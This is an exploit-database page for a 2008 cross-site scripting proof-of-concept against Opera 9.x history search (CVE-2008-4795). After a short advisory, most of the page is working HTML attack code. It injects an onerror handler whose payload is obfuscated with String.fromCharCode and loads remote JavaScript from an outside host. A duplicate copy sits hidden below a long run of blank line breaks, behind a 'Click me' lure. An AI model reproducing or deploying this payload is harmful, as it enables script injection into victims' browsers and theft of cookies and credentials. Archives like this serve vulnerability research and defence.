Exploit Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting

[Exploiter]

EDB-ID

32548

Проверка EDB

1. Пройдено

Автор

STEFANO DI PAOLA

Тип уязвимости

REMOTE

Платформа

LINUX

CVE

cve-2008-4795

Дата публикации

2008-10-30

source: https://www.securityfocus.com/bid/31991/info

Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, change the browser's settings, and launch other attacks.

Versions prior to Opera Web Browser 9.62 are vulnerable.

NOTE: The 'History Search' issue described here may be related to the 'History Search' issue that was previously described in BID 31842 'Opera Web Browser Multiple Cross Site Scripting Vulnerabilities'.

<!-- --Aviv. http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx --> <html> <script> function x() { window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="x()">Click me...</a> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'> </body> </html> # milw0rm.com [2008-10-30]